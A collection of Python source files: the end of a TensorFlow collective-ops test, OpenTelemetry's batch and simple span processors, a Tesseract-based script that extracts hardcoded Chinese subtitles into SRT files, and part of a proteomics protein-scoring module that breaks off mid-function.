# pylint: enable=pointless-statement
graph = f.get_concrete_function().graph
should_be_ordered = set([
"CollectiveReduceV2", "CollectiveGatherV2", "If", "While",
"StatefulPartitionedCall"
])
nodes_by_device = {}
for op in graph.get_operations():
if op.type in should_be_ordered:
if op.device not in nodes_by_device:
nodes_by_device[op.device] = []
nodes_by_device[op.device].append(op)
order = test_util.topological_sort_operations(graph.get_operations())
for device in devices:
device = device_util.canonicalize(device)
# Those function ops don't have device annotations, but they contain
# collectives for both devices so we always include them.
operations = nodes_by_device[device] + nodes_by_device[""]
# Verify that we get all types of nodes we want.
self.assertEqual(set(op.type for op in operations), should_be_ordered)
test_util.assert_sequential_execution(order, operations)
get_global_mpr(num_processes).run(replica_fn)
if __name__ == "__main__":
# Set default inter op thread pool size to one to ensure we don't exhaust the
# thread pool with the additional executors to run collectives in eager.
os.environ["TF_NUM_INTEROP_THREADS"] = "1"
# TODO(b/172304955): figure why logical devices doesn't work.
test_util.main(config_logical_devices=False)
|
__init__.py | # Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import sys
import threading
import typing
from enum import Enum
from os import environ, linesep
from typing import Optional
from opentelemetry.context import Context, attach, detach, set_value
from opentelemetry.sdk.environment_variables import (
OTEL_BSP_EXPORT_TIMEOUT,
OTEL_BSP_MAX_EXPORT_BATCH_SIZE,
OTEL_BSP_MAX_QUEUE_SIZE,
OTEL_BSP_SCHEDULE_DELAY,
)
from opentelemetry.sdk.trace import ReadableSpan, Span, SpanProcessor
from opentelemetry.util._time import _time_ns
logger = logging.getLogger(__name__)
class SpanExportResult(Enum):
SUCCESS = 0
FAILURE = 1
class SpanExporter:
"""Interface for exporting spans.
Interface to be implemented by services that want to export spans recorded
in their own format.
To export data this MUST be registered to the :class`opentelemetry.sdk.trace.Tracer` using a
`SimpleSpanProcessor` or a `BatchSpanProcessor`.
"""
def export(
self, spans: typing.Sequence[ReadableSpan]
) -> "SpanExportResult":
"""Exports a batch of telemetry data.
Args:
spans: The list of `opentelemetry.trace.Span` objects to be exported
Returns:
The result of the export
"""
def shutdown(self) -> None:
"""Shuts down the exporter.
Called when the SDK is shut down.
"""
class SimpleSpanProcessor(SpanProcessor):
"""Simple SpanProcessor implementation.
SimpleSpanProcessor is an implementation of `SpanProcessor` that
passes ended spans directly to the configured `SpanExporter`.
"""
def __init__(self, span_exporter: SpanExporter):
self.span_exporter = span_exporter
def on_start(
self, span: Span, parent_context: typing.Optional[Context] = None
) -> None:
pass
def on_end(self, span: ReadableSpan) -> None:
if not span.context.trace_flags.sampled:
return
token = attach(set_value("suppress_instrumentation", True))
try:
self.span_exporter.export((span,))
# pylint: disable=broad-except
except Exception:
logger.exception("Exception while exporting Span.")
detach(token)
def shutdown(self) -> None:
self.span_exporter.shutdown()
def force_flush(self, timeout_millis: int = 30000) -> bool:
# pylint: disable=unused-argument
return True
class _FlushRequest:
"""Represents a request for the BatchSpanProcessor to flush spans."""
__slots__ = ["event", "num_spans"]
def __init__(self):
self.event = threading.Event()
self.num_spans = 0
class BatchSpanProcessor(SpanProcessor):
"""Batch span processor implementation.
`BatchSpanProcessor` is an implementation of `SpanProcessor` that
batches ended spans and pushes them to the configured `SpanExporter`.
`BatchSpanProcessor` is configurable with the following environment
variables which correspond to constructor parameters:
- :envvar:`OTEL_BSP_SCHEDULE_DELAY`
- :envvar:`OTEL_BSP_MAX_QUEUE_SIZE`
- :envvar:`OTEL_BSP_MAX_EXPORT_BATCH_SIZE`
- :envvar:`OTEL_BSP_EXPORT_TIMEOUT`
"""
def __init__(
self,
span_exporter: SpanExporter,
max_queue_size: int = None,
schedule_delay_millis: float = None,
max_export_batch_size: int = None,
export_timeout_millis: float = None,
):
if max_queue_size is None:
max_queue_size = int(environ.get(OTEL_BSP_MAX_QUEUE_SIZE, 2048))
if schedule_delay_millis is None:
schedule_delay_millis = int(
environ.get(OTEL_BSP_SCHEDULE_DELAY, 5000)
)
if max_export_batch_size is None:
max_export_batch_size = int(
environ.get(OTEL_BSP_MAX_EXPORT_BATCH_SIZE, 512)
)
if export_timeout_millis is None:
export_timeout_millis = int(
environ.get(OTEL_BSP_EXPORT_TIMEOUT, 30000)
)
if max_queue_size <= 0:
raise ValueError("max_queue_size must be a positive integer.")
if schedule_delay_millis <= 0:
raise ValueError("schedule_delay_millis must be positive.")
if max_export_batch_size <= 0:
raise ValueError(
"max_export_batch_size must be a positive integer."
)
if max_export_batch_size > max_queue_size:
raise ValueError(
"max_export_batch_size must be less than or equal to max_queue_size."
)
self.span_exporter = span_exporter
self.queue = collections.deque(
[], max_queue_size
) # type: typing.Deque[Span]
self.worker_thread = threading.Thread(target=self.worker, daemon=True)
self.condition = threading.Condition(threading.Lock())
self._flush_request = None # type: typing.Optional[_FlushRequest]
self.schedule_delay_millis = schedule_delay_millis
self.max_export_batch_size = max_export_batch_size
self.max_queue_size = max_queue_size
self.export_timeout_millis = export_timeout_millis
self.done = False
# flag that indicates that spans are being dropped
self._spans_dropped = False
# precallocated list to send spans to exporter
self.spans_list = [
None
] * self.max_export_batch_size # type: typing.List[typing.Optional[Span]]
self.worker_thread.start()
def on_start(
self, span: Span, parent_context: typing.Optional[Context] = None
) -> None:
pass
def on_end(self, span: ReadableSpan) -> None:
if self.done:
logger.warning("Already shutdown, dropping span.")
return
if not span.context.trace_flags.sampled:
return
if len(self.queue) == self.max_queue_size:
if not self._spans_dropped:
logger.warning("Queue is full, likely spans will be dropped.")
self._spans_dropped = True
self.queue.appendleft(span)
if len(self.queue) >= self.max_export_batch_size:
with self.condition:
self.condition.notify()
def worker(self):
timeout = self.schedule_delay_millis / 1e3
flush_request = None # type: typing.Optional[_FlushRequest]
while not self.done:
with self.condition:
if self.done:
# done flag may have changed, avoid waiting
break
flush_request = self._get_and_unset_flush_request()
if (
len(self.queue) < self.max_export_batch_size
and flush_request is None
):
self.condition.wait(timeout)
flush_request = self._get_and_unset_flush_request()
if not self.queue:
# spurious notification, let's wait again, reset timeout
timeout = self.schedule_delay_millis / 1e3
self._notify_flush_request_finished(flush_request)
flush_request = None
continue
if self.done:
# missing spans will be sent when calling flush
break
# subtract the duration of this export call to the next timeout
start = _time_ns()
self._export(flush_request)
end = _time_ns()
duration = (end - start) / 1e9
timeout = self.schedule_delay_millis / 1e3 - duration
self._notify_flush_request_finished(flush_request)
flush_request = None
# there might have been a new flush request while export was running
# and before the done flag switched to true
with self.condition:
shutdown_flush_request = self._get_and_unset_flush_request()
# be sure that all spans are sent
self._drain_queue()
self._notify_flush_request_finished(flush_request)
self._notify_flush_request_finished(shutdown_flush_request)
def _get_and_unset_flush_request(self,) -> typing.Optional[_FlushRequest]:
"""Returns the current flush request and makes it invisible to the
worker thread for subsequent calls.
"""
flush_request = self._flush_request
self._flush_request = None
if flush_request is not None:
flush_request.num_spans = len(self.queue)
return flush_request
@staticmethod
def _notify_flush_request_finished(
flush_request: typing.Optional[_FlushRequest],
):
"""Notifies the flush initiator(s) waiting on the given request/event
that the flush operation was finished.
"""
if flush_request is not None:
flush_request.event.set()
def _get_or_create_flush_request(self) -> _FlushRequest:
"""Either returns the current active flush event or creates a new one.
The flush event will be visible and read by the worker thread before an
export operation starts. Callers of a flush operation may wait on the
returned event to be notified when the flush/export operation was
finished.
This method is not thread-safe, i.e. callers need to take care about
synchronization/locking.
"""
if self._flush_request is None:
self._flush_request = _FlushRequest()
return self._flush_request
def _export(self, flush_request: typing.Optional[_FlushRequest]):
"""Exports spans considering the given flush_request.
In case of a given flush_requests spans are exported in batches until
the number of exported spans reached or exceeded the number of spans in
the flush request.
In no flush_request was given at most max_export_batch_size spans are
exported.
"""
if not flush_request:
self._export_batch()
return
num_spans = flush_request.num_spans
while self.queue:
num_exported = self._export_batch()
num_spans -= num_exported
if num_spans <= 0:
break
def _export_batch(self) -> int:
"""Exports at most max_export_batch_size spans and returns the number of
exported spans.
"""
idx = 0
# currently only a single thread acts as consumer, so queue.pop() will
# not raise an exception
while idx < self.max_export_batch_size and self.queue:
self.spans_list[idx] = self.queue.pop()
idx += 1
token = attach(set_value("suppress_instrumentation", True))
try:
# Ignore type b/c the Optional[None]+slicing is too "clever"
# for mypy
self.span_exporter.export(self.spans_list[:idx]) # type: ignore
except Exception: # pylint: disable=broad-except
logger.exception("Exception while exporting Span batch.")
detach(token)
# clean up list
for index in range(idx):
self.spans_list[index] = None
return idx
def _drain_queue(self):
"""Export all elements until queue is empty.
Can only be called from the worker thread context because it invokes
`export` that is not thread safe.
"""
while self.queue:
self._export_batch()
def force_flush(self, timeout_millis: int = None) -> bool:
if timeout_millis is None:
timeout_millis = self.export_timeout_millis
if self.done:
logger.warning("Already shutdown, ignoring call to force_flush().")
return True
with self.condition:
flush_request = self._get_or_create_flush_request()
# signal the worker thread to flush and wait for it to finish
self.condition.notify_all()
# wait for token to be processed
ret = flush_request.event.wait(timeout_millis / 1e3)
if not ret:
logger.warning("Timeout was exceeded in force_flush().")
return ret
def shutdown(self) -> None:
# signal the worker thread to finish and then wait for it
self.done = True
with self.condition:
self.condition.notify_all()
self.worker_thread.join()
self.span_exporter.shutdown()
class ConsoleSpanExporter(SpanExporter):
"""Implementation of :class:`SpanExporter` that prints spans to the
console.
This class can be used for diagnostic purposes. It prints the exported
spans to the console STDOUT.
"""
def __init__(
self,
service_name: Optional[str] = None,
out: typing.IO = sys.stdout,
formatter: typing.Callable[
[ReadableSpan], str
] = lambda span: span.to_json()
+ linesep,
):
self.out = out
self.formatter = formatter
self.service_name = service_name
def export(self, spans: typing.Sequence[ReadableSpan]) -> SpanExportResult:
for span in spans:
self.out.write(self.formatter(span))
self.out.flush()
return SpanExportResult.SUCCESS
|
hard_subs_to_srt.py | from os import times
from PIL import Image
import pytesseract
import imagehash
import cv2
import numpy
import sys
from imutils.video import FileVideoStream
from queue import Queue
from threading import Thread
import argparse
FIRST_FRAME = 2500 # Skip frames up to this point
PREVIEW_MAX_SIZE = (1280, 720)
# The subtitles are within these bounds. The bounds are not super tight since
# Tesseract works better with some blank space around the text.
SUBTITLE_BOUNDS_LEFT = 820
SUBTITLE_BOUNDS_RIGHT = 3020
SUBTITLE_BOUNDS_TOP = 1600
SUBTITLE_BOUNDS_BOTTOM = 1863
# We force some space above and below the subtitles to be white before feeding
# the text images to Tesseract.
SUBTITLE_BLANK_SPACE_ABOVE = 46
SUBTITLE_BLANK_SPACE_BELOW = 63
# Hardcoded subtitles are not entirely white. To filter out subtitles we look
# for pixels that are as bright or brighter than this. Completely white is 255
SUBTITLES_MIN_VALUE = 250
# We add some blur to the subtitle images before feeding them to Tesseract since
# some pixels within the subtitles are not white enough. This also eliminates
# smaller groups of white pixels outside of the subtitles. A bigger value means
# more blur.
SUBTITLE_IMAGE_BLUR_SIZE = (21, 21)
# After blurring the image we make the image monochrome since that works better
# for Tesseract. This is the limit for what should be considered a (white)
# subtitle pixel after the blur.
SUBTITLES_MIN_VALUE_AFTER_BLUR = 55
# Only use Tesseract if the subtitle changes. This is for performance and also
# to avoid having single frames of Tesseract mistakes that get entered into the
# SRT file. To tell if two images are of the same subtitle we compare the image
# hashes of them. See https://pypi.org/project/ImageHash/ for more information.
IMAGE_HASH_SIZE = 32
MAX_HASH_DIFFERENCE_FOR_SAME_SUBTITLE = 20
NO_SUBTILE_FRAME_HASH = imagehash.hex_to_hash('0' * 256)
TESSERACT_EXPECTED_LANGUAGE = 'chi_sim'
# Page segmentation mode (PSM) 13 means "Raw line. Treat the image as a single
# text line, bypassing hacks that are Tesseract-specific." See this link for
# other options:
# https://tesseract-ocr.github.io/tessdoc/ImproveQuality.html#page-segmentation-method
TESSERACT_CONFIG = '--psm 13'
# Tesseract makes mistakes. Some are easy to fix. Keys in this dictionary will
# be replaced with their respective values.
COMMON_MISTAKES = {
'-': '一',
'+': '十',
'F': '上',
',': '',
'。': '',
'”': '',
}
OUTPUT_ENCODING = 'utf-8'
def main():
parser = argparse.ArgumentParser(
description='Creates an SRT file from a video file that has hardcoded subtitles')
parser.add_argument(
'video_file', help='the path to a video file that has hardcoded subtitles')
parser.add_argument(
'srt_file', help='where to put the resulting SRT file, will overwrite if it is already there')
args = parser.parse_args()
extract_srt(args.video_file, args.srt_file)
def extract_srt(video_file, srt_file):
video = FileVideoStream(video_file)
video.stream.set(cv2.CAP_PROP_POS_FRAMES, FIRST_FRAME)
if video.stream.isOpened() == False:
print('Error opening video stream or file')
return
sys.stdout = FileAndTerminalStream(srt_file)
convert_frames_to_srt(video, FIRST_FRAME)
sys.stdout = sys.stdout.terminal
cv2.destroyAllWindows()
video.stop()
class FileAndTerminalStream(object):
def __init__(self, file):
self.terminal = sys.stdout
self.srt = open(file, 'w', encoding=OUTPUT_ENCODING)
def write(self, message):
self.terminal.write(message)
self.srt.write(message)
def flush(self):
# this flush method is needed for python 3 compatibility.
pass
def convert_frames_to_srt(video, first_frame_pos):
prev_frame_hash = NO_SUBTILE_FRAME_HASH
frame_number = first_frame_pos
reader = SubtitleReader()
keyboard = Keyboard()
width = video.stream.get(cv2.CAP_PROP_FRAME_WIDTH)
height = video.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)
preview_size = limit_size((width, height), PREVIEW_MAX_SIZE)
video.start()
reader.start()
frame = video.read()
while frame is not None:
cropped_frame = frame[SUBTITLE_BOUNDS_TOP:SUBTITLE_BOUNDS_BOTTOM,
SUBTITLE_BOUNDS_LEFT:SUBTITLE_BOUNDS_RIGHT]
monochrome_frame = to_monochrome_subtitle_frame(cropped_frame)
cv2.imshow('Orignal', cv2.resize(frame, preview_size))
cv2.imshow('Processed image for tesseract', monochrome_frame)
textImage = Image.fromarray(monochrome_frame)
frame_hash = imagehash.average_hash(textImage, IMAGE_HASH_SIZE)
# Only use Tesseract if the subtitle changes. This is for performance
# and also to avoid having single frames of Tesseract mistakes that get
# entered into the SRT file.
hash_difference = abs(prev_frame_hash - frame_hash)
if hash_difference > MAX_HASH_DIFFERENCE_FOR_SAME_SUBTITLE:
timestamp = get_millis_for_frame(video, frame_number)
if frame_hash == NO_SUBTILE_FRAME_HASH:
# no need to use Tesseract when the input is a white rectangle
change = EmptySubtitleChange(timestamp)
else:
change = SubtitleChange(monochrome_frame, timestamp)
reader.provide_material(change)
prev_frame_hash = frame_hash
frame_number += 1
keyboard.wait_key()
# fps.update()
if keyboard.last_pressed_key == ord('q'):
return
elif keyboard.last_pressed_key == ord('p'):
while keyboard.wait_key() != ord('c'):
if (keyboard.last_pressed_key == ord('q')):
return
frame = video.read()
class SubtitleReader:
def __init__(self):
self.changes = Queue(maxsize=128)
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
def start(self):
self.thread.start()
def update(self):
subtitle_index = 1
prev_line = ""
prev_change_millis = 0 # either the start or the end of a subtitle line
while True:
change = self.changes.get()
line = change.read_subtitle()
if prev_line != line:
if prev_line != '':
print_line(
index=subtitle_index,
start_time=prev_change_millis,
end_time=change.timestamp,
text=prev_line)
subtitle_index += 1
prev_line = line
prev_change_millis = change.timestamp
def provide_material(self, subtitle_change):
self.changes.put(subtitle_change)
def print_line(index, start_time, end_time, text):
line_start_time = millis_to_srt_timestamp(start_time)
line_end_time = millis_to_srt_timestamp(end_time)
print(index)
print(line_start_time + ' --> ' + line_end_time)
print(text)
print()
class SubtitleChange:
def __init__(self, frame, timestamp):
self.frame = frame
self.timestamp = timestamp
def read_subtitle(self):
line = pytesseract.image_to_string(self.frame,
lang=TESSERACT_EXPECTED_LANGUAGE, config=TESSERACT_CONFIG)
return clean_up_tesseract_output(line)
class EmptySubtitleChange:
def __init__(self, timestamp):
self.timestamp = timestamp
def read_subtitle(self):
return ''
class Keyboard:
last_pressed_key = 0
def wait_key(self):
self.last_pressed_key = cv2.waitKey(1)
return self.last_pressed_key
def limit_size(size, max_dimensions):
(width, height) = size
(max_width, max_height) = max_dimensions
if width <= max_width and height <= max_height:
return size
if width / height > max_width / max_height:
return (max_width, int(height * max_width / width))
else:
return (int(width * max_height / height), max_height)
def to_monochrome_subtitle_frame(cropped_frame):
# see https://tesseract-ocr.github.io/tessdoc/ImproveQuality.html for more
# information
img = cv2.cvtColor(cropped_frame, cv2.COLOR_BGR2GRAY)
# make the image monochrome where only the whitest pixel are kept white
img = cv2.threshold(img, SUBTITLES_MIN_VALUE, 255, cv2.THRESH_BINARY)[1]
bounds_width = SUBTITLE_BOUNDS_RIGHT - SUBTITLE_BOUNDS_LEFT
bounds_height = SUBTITLE_BOUNDS_BOTTOM - SUBTITLE_BOUNDS_TOP
whitespace_below_y = bounds_height - SUBTITLE_BLANK_SPACE_BELOW
above_subtitles = numpy.array([[0, 0], [0, SUBTITLE_BLANK_SPACE_ABOVE],
[bounds_width, SUBTITLE_BLANK_SPACE_ABOVE], [bounds_width, 0]])
below_subtitles = numpy.array([[0, whitespace_below_y], [0, bounds_height],
[bounds_width, bounds_height], [bounds_width, whitespace_below_y]])
# ensure white above and below text. Some blank space is needed for
# Tesseract
img = cv2.fillPoly(img, pts=[above_subtitles, below_subtitles], color=0)
# Add some blur since some pixels within the subtitles are not completely
# white. This also eliminates smaller groups of white pixels outside of the
# subtitles
img = cv2.GaussianBlur(img, SUBTITLE_IMAGE_BLUR_SIZE, 0)
img = cv2.threshold(
img, SUBTITLES_MIN_VALUE_AFTER_BLUR, 255, cv2.THRESH_BINARY)[1]
# Invert the colors to have white background with black text.
img = cv2.bitwise_not(img)
return img
def clean_up_tesseract_output(text):
for key, value in COMMON_MISTAKES.items():
text = text.replace(key, value)
text = text.strip()
return text
def millis_to_srt_timestamp(total_millis):
(total_seconds, millis) = divmod(total_millis, 1000)
(total_minutes, seconds) = divmod(total_seconds, 60)
(hours, minutes) = divmod(total_minutes, 60)
time_format = '{:02}:{:02}:{:02},{:03}'
return time_format.format(int(hours), int(minutes), int(seconds), int(millis))
def get_millis_for_frame(video, frame_number):
return 1000.0 * frame_number / video.stream.get(cv2.CAP_PROP_FPS)
if __name__ == "__main__":
main()
|
main.py | import os
from . import utils
import numpy as np
from scipy.stats import scoreatpercentile
from scipy.optimize import curve_fit
from scipy import exp
import operator
from copy import copy, deepcopy
from collections import defaultdict, Counter
import re
from pyteomics import parser, mass, fasta, auxiliary as aux, achrom
try:
from pyteomics import cmass
except ImportError:
cmass = mass
import subprocess
from sklearn import linear_model
import tempfile
import pandas as pd
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from multiprocessing import Queue, Process, cpu_count
from itertools import chain
try:
import seaborn
seaborn.set(rc={'axes.facecolor':'#ffffff'})
seaborn.set_style('whitegrid')
except:
pass
from .utils import calc_sf_all, recalc_spc
import lightgbm as lgb
import pandas as pd
from sklearn.model_selection import train_test_split
from scipy.stats import zscore, spearmanr
import pandas as pd
from pyteomics import pepxml, achrom, auxiliary as aux, mass, fasta, mzid, parser
from pyteomics import electrochem
import numpy as np
import random
SEED = 42
from sklearn.model_selection import train_test_split
from os import path, mkdir
from collections import Counter, defaultdict
import warnings
import pylab as plt
warnings.formatwarning = lambda msg, *args, **kw: str(msg) + '\n'
import pandas as pd
from sklearn.model_selection import train_test_split, KFold
import os
from collections import Counter, defaultdict
from scipy.stats import scoreatpercentile
from sklearn.isotonic import IsotonicRegression
import warnings
import numpy as np
import matplotlib
import numpy
import pandas
import random
import sklearn
import matplotlib.pyplot as plt
from sklearn import (
feature_extraction, feature_selection, decomposition, linear_model,
model_selection, metrics, svm
)
import scipy
from scipy.stats import rankdata
from copy import deepcopy
import csv
from scipy.stats import rankdata
import lightgbm as lgb
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from itertools import chain
import time as timemodule
import ast
from sklearn import metrics
SEED = 50
def worker_RT(qin, qout, shift, step, RC=False, elude_path=False, ns=False, nr=False, win_sys=False):
pepdict = dict()
if elude_path:
outtrain_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
outtrain = open(outtrain_name, 'w')
outres_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
for seq, RT in zip(ns, nr):
outtrain.write(seq + '\t' + str(RT) + '\n')
outtrain.close()
outtest_name = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())
outtest = open(outtest_name, 'w')
maxval = len(qin)
start = 0
while start + shift < maxval:
item = qin[start+shift]
outtest.write(item + '\n')
start += step
outtest.close()
subprocess.call([elude_path, '-t', outtrain_name, '-e', outtest_name, '-a', '-o', outres_name])
for x in open(outres_name).readlines()[3:]:
seq, RT = x.strip().split('\t')
pepdict[seq] = float(RT)
else:
maxval = len(qin)
start = 0
while start + shift < maxval:
item = qin[start+shift]
pepdict[item] = achrom.calculate_RT(item, RC)
start += step
if win_sys:
return pepdict
else:
qout.put(pepdict)
qout.put(None)
def final_iteration(resdict, mass_diff, rt_diff, pept_prot, protsN, base_out_name, prefix, isdecoy, isdecoy_key, escore, fdr, nproc, fname=False):
n = nproc
prots_spc_basic = dict()
p1 = set(resdict['seqs'])
pep_pid = defaultdict(set)
pid_pep = defaultdict(set)
banned_dict = dict()
for pep, pid in zip(resdict['seqs'], resdict['ids']):
pep_pid[pep].add(pid)
pid_pep[pid].add(pep)
if pep in banned_dict:
banned_dict[pep] += 1
else:
banned_dict[pep] = 1
if len(p1):
prots_spc_final = dict()
prots_spc_copy = False
prots_spc2 = False
unstable_prots = set()
p0 = False
names_arr = False
tmp_spc_new = False
decoy_set = False
while 1:
if not prots_spc2:
best_match_dict = dict()
n_map_dict = defaultdict(list)
for k, v in protsN.items():
n_map_dict[v].append(k)
decoy_set = set()
for k in protsN:
if isdecoy_key(k):
decoy_set.add(k)
decoy_set = list(decoy_set)
prots_spc2 = defaultdict(set)
for pep, proteins in pept_prot.items():
if pep in p1:
for protein in proteins:
prots_spc2[protein].add(pep)
for k in protsN:
if k not in prots_spc2:
prots_spc2[k] = set([])
prots_spc2 = dict(prots_spc2)
unstable_prots = set(prots_spc2.keys())
top100decoy_N = sum([val for key, val in protsN.items() if isdecoy_key(key)])
names_arr = np.array(list(prots_spc2.keys()))
n_arr = np.array([protsN[k] for k in names_arr])
tmp_spc_new = dict((k, len(v)) for k, v in prots_spc2.items())
top100decoy_score_tmp = [tmp_spc_new.get(dprot, 0) for dprot in decoy_set]
top100decoy_score_tmp_sum = float(sum(top100decoy_score_tmp))
tmp_spc = tmp_spc_new
prots_spc = tmp_spc_new
if not prots_spc_copy:
prots_spc_copy = deepcopy(prots_spc)
for idx, v in enumerate(decoy_set):
if v in unstable_prots:
top100decoy_score_tmp_sum -= top100decoy_score_tmp[idx]
top100decoy_score_tmp[idx] = prots_spc.get(v, 0)
top100decoy_score_tmp_sum += top100decoy_score_tmp[idx]
p = float(sum(top100decoy_score_tmp)) / top100decoy_N
p = top100decoy_score_tmp_sum / top100decoy_N
n_change = set(protsN[k] for k in unstable_prots)
for n_val in n_change:
for k in n_map_dict[n_val]:
v = prots_spc[k]
if n_val not in best_match_dict or v > prots_spc[best_match_dict[n_val]]:
best_match_dict[n_val] = k
n_arr_small = []
names_arr_small = []
v_arr_small = []
for k, v in best_match_dict.items():
n_arr_small.append(k)
names_arr_small.append(v)
v_arr_small.append(prots_spc[v])
prots_spc_basic = dict()
all_pvals = calc_sf_all(np.array(v_arr_small), n_arr_small, p)
for idx, k in enumerate(names_arr_small):
prots_spc_basic[k] = all_pvals[idx]
if not p0:
p0 = float(p)
prots_spc_tmp = dict()
v_arr = np.array([prots_spc[k] for k in names_arr])
all_pvals = calc_sf_all(v_arr, n_arr, p)
for idx, k in enumerate(names_arr):
prots_spc_tmp[k] = all_pvals[idx]
sortedlist_spc = sorted(prots_spc_tmp.items(), key=operator.itemgetter(1))[::-1]
with open(base_out_name + '_proteins_full_noexclusion.tsv', 'w') as output:
output.write('dbname\tscore\tmatched peptides\ttheoretical peptides\n')
for x in sortedlist_spc:
output.write('\t'.join((x[0], str(x[1]), str(prots_spc_copy[x[0]]), str(protsN[x[0]]))) + '\n')
best_prot = utils.keywithmaxval(prots_spc_basic)
best_score = prots_spc_basic[best_prot]
unstable_prots = set()
if best_prot not in prots_spc_final:
prots_spc_final[best_prot] = best_score
banned_pids = set()
for pep in prots_spc2[best_prot]:
for pid in pep_pid[pep]:
banned_pids.add(pid)
for pid in banned_pids:
for pep in pid_pep[pid]:
banned_dict[pep] -= 1
if banned_dict[pep] == 0:
for bprot in pept_prot[pep]:
tmp_spc_new[bprot] -= 1
unstable_prots.add(bprot)
else:
v_arr = np.array([prots_spc[k] for k in names_arr])
all_pvals = calc_sf_all(v_arr, n_arr, p)
for idx, k in enumerate(names_arr):
prots_spc_basic[k] = all_pvals[idx]
for k, v in prots_spc_basic.items():
if k not in prots_spc_final:
prots_spc_final[k] = v
break
prot_fdr = aux.fdr(prots_spc_final.items(), is_decoy=isdecoy)
if prot_fdr >= 12.5 * fdr:
v_arr = np.array([prots_spc[k] for k in names_arr])
all_pvals = calc_sf_all(v_arr, n_arr, p)
for idx, k in enumerate(names_arr):
prots_spc_basic[k] = all_pvals[idx]
for k, v in prots_spc_basic.items():
if k not in prots_spc_final:
prots_spc_final[k] = v
break
prots_spc_basic2 = copy(prots_spc_final)
prots_spc_final = dict()
prots_spc_final2 = dict()
if n == 0:
try:
n = cpu_count()
except NotImplementedError:
n = 1
if n == 1 or os.name == 'nt':
qin = []
qout = []
for mass_koef in range(10):
rtt_koef = mass_koef
qin.append((mass_koef, rtt_koef))
qout = worker(qin, qout, mass_diff, rt_diff, resdict, protsN, pept_prot, isdecoy_key, isdecoy, fdr, prots_spc_basic2, True)
for item, item2 in qout:
if item2:
prots_spc_copy = item2
for k in protsN:
if k not in prots_spc_final:
prots_spc_final[k] = [item.get(k, 0.0), ]
else:
prots_spc_final[k].append(item.get(k, 0.0))
else:
qin = Queue()
qout = Queue()
for mass_koef in range(10):
rtt_koef = mass_koef
qin.put((mass_koef, rtt_koef))
for _ in range(n):
qin.put(None)
procs = []
for proc_num in range(n):
p = Process(target=worker, args=(qin, qout, mass_diff, rt_diff, resdict, protsN, pept_prot, isdecoy_key, isdecoy, fdr, prots_spc_basic2))
p.start()
procs.append(p)
for _ in range(n):
for item, item2 in iter(qout.get, None):
if item2:
prots_spc_copy = item2
for k in protsN:
if k not in prots_spc_final:
prots_spc_final[k] = [item.get(k, 0.0), ]
else:
prots_spc_final[k].append(item.get(k, 0.0))
for p in procs:
p.join()
for k in prots_spc_final.keys():
prots_spc_final[k] = np.mean(prots_spc_final[k])
prots_spc = deepcopy(prots_spc_final)
sortedlist_spc = sorted(prots_spc.items(), key=operator.itemgetter(1))[::-1]
with open(base_out_name + '_proteins_full.tsv', 'w') as output:
output.write('dbname\tscore\tmatched peptides\ttheoretical peptides\n')
for x in sortedlist_spc:
output.write('\t'.join((x[0], str(x[1]), str(prots_spc_copy[x[0]]), str(protsN[x[0]]))) + '\n')
checked = set()
for k, v in list(prots_spc.items()):
if k not in checked:
if isdecoy_key(k):
if prots_spc.get(k.replace(prefix, ''), -1e6) > v:
del prots_spc[k]
checked.add(k.replace(prefix, ''))
else:
if prots_spc.get(prefix + k, -1e6) > v:
del prots_spc[k]
checked.add(prefix + k)
filtered_prots = aux.filter(prots_spc.items(), fdr=fdr, key=escore, is_decoy=isdecoy, remove_decoy=True, formula=1, full_output=True, correction=1)
if len(filtered_prots) < 1:
filtered_prots = aux.filter(prots_spc.items(), fdr=fdr, key=escore, is_decoy=isdecoy, remove_decoy=True, formula=1, full_output=True, correction=0)
identified_proteins = 0
for x in filtered_prots:
identified_proteins += 1
print('TOP 5 identified proteins:')
print('dbname\tscore\tnum matched peptides\tnum theoretical peptides')
for x in filtered_prots[:5]:
print('\t'.join((str(x[0]), str(x[1]), str(int(prots_spc_copy[x[0]])), str(protsN[x[0]]))))
print('results:%s;number of identified proteins = %d' % (base_out_name, identified_proteins, ))
# print('R=', r)
with open(base_out_name + '_proteins.tsv', 'w') as output:
output.write('dbname\tscore\tmatched peptides\ttheoretical peptides\n')
for x in filtered_prots:
output.write('\t'.join((x[0], str(x[1]), str(prots_spc_copy[x[0]]), str(protsN[x[0]]))) + '\n')
if fname:
fig = plt.figure(figsize=(16, 12))
DPI = fig.get_dpi()
fig.set_size_inches(2000.0/float(DPI), 2000.0/float(DPI))
df0 = pd.read_table(os.path.splitext(fname)[0].replace('.features', '') + '.features' + '.tsv')
# Features RT distribution
# TODO add matched features and matched to 1% FDR proteins features
ax = fig.add_subplot(3, 1, 1)
bns = np.arange(0, df0['rtApex'].max() + 1, 1)
ax.hist(df0['rtApex'], bins = bns)
ax.set_xlabel('RT, min', size=16)
ax.set_ylabel('# features', size=16)
# Features mass distribution
# TODO add matched features and matched to 1% FDR proteins features
ax = fig.add_subplot(3, 1, 2)
bns = np.arange(0, df0['massCalib'].max() + 6, 5)
ax.hist(df0['massCalib'], bins = bns)
ax.set_xlabel('neutral mass, Da', size=16)
ax.set_ylabel('# features', size=16)
# Features intensity distribution
# TODO add matched features and matched to 1% FDR proteins features
ax = fig.add_subplot(3, 1, 3)
bns = np.arange(np.log10(df0['intensityApex'].min()) - 0.5, np.log10(df0['intensityApex'].max()) + 0.5, 0.5)
ax.hist(np.log10(df0['intensityApex']), bins = bns)
ax.set_xlabel('log10(Intensity)', size=16)
ax.set_ylabel('# features', size=16)
plt.savefig(base_out_name + '.png')
def noisygaus(x, a, x0, sigma, b):
return a * exp(-(x - x0) ** 2 / (2 * sigma ** 2)) + b
def calibrate_mass(bwidth, mass_left, mass_right, true_md):
